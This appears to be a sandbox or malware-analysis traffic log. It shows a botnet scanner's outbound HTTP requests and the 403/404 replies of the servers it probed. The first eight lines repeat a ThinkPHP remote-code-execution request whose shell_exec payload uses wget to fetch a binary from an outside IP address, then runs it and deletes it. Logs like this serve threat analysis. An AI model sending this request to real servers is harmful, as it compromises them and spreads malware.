Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://209.141.40.100/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.1Date: Fri, 29 Oct 2021 18:19:14 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.8.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 17:55:12 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Content-Length: 298Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6a 20 50 48 50 2f 38 2e 30 2e 33 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 Server at 192.168.0.14 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 20:19:21 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.0.15Date: Fri, 29 Oct 2021 18:19:26 GMTContent-Type: text/html; charset=utf-8Content-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 30 2e 31 35 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.0.15</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 20:21:32 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 207Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 68 6f 6d 65 2f 68 69 6b 2f 77 65 62 73 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /home/hik/webs/cgi-bin/ViewLog.asp</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 21:21:26 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:19:31 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/7.3.17Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 21:19:34 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1007Date: Fri, 29 Oct 2021 18:19:39 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 37 2e 30 2e 35 32 20 28 55 62 75 6e 74 75 29 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 21:19:33 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Language: enContent-Length: 1050Date: Fri, 29 Oct 2021 18:19:47 GMT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Fri, 29 Oct 2021 18:19:51 GMT
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 20:21:37 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:19:58 GMTServer: ServerX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:19:58 GMTServer: ServerX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 29 Oct 2021 18:19:58 GMTServer: ServerX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 207Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>
